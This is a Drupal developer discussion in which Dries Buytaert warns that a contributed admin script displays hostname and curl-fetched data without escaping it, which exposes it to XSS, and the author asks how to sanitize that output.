"Dries Buytaert" wrote:
The screenshots look nice but the code looks a little dangerous as you're not validating the input. Hackers can inject XSS attacks.
I'm not sure who the hackers would be, since this is on the admin side of things, and my script only operates on the hostname that is already in the SQL db.
If the server you 'curl' sends back malicious Javascript, they could hijack your session and take over your website.
Okay, this I get. The returned result point, that is. (Perhaps if 'hostip.info' wants my web site, they can have it. ;) Where should I look for a similar "wiper" for the return?
Yeah. This script, in the admin pages, only acts on whatever data is in the watchdog 'hostname' field, which is an IP address placed there by other parts of Drupal (as you know. ;)
MySQL tables in Drupal contain insecure data, including the watchdog and statistics tables. Drupal cleans up the data "on output" (just before sending the data to the client). Your code does not clean up the data, whereas the original code did.
Perhaps I'm not following you (and I'd like to), so this is not argumentative, rather it is educational. I just reviewed 'watchdog' again, and I don't see any clean-up. The original watchdog code says: # $output .= ' <tr><th>'. t('Hostname') ."</th><td>$watchdog->hostname</td></tr>"; # I use the same value, in a different place. This _is_ the "on output" value, so whatever Drupal gives me (in /admin/) already, that's exactly what I re-display. Now, I do notice that 'watchdog' and 'statistics' do redundant work, but whereas the 'watchdog' module just outputs $watchdog->hostname the 'statistics' module outputs check_plain($access->hostname) (Which is the same value, different variable names.) This is true for the repeated identical table in both modules...statistics module wraps the output in another function, watchdog does not. Any tips on the 'curl' cleaning, I can use. Otherwise, with the display of the IP address stored by Drupal, I just repeat whatever 'watchdog' already uses, and that meets my needs. -- Gary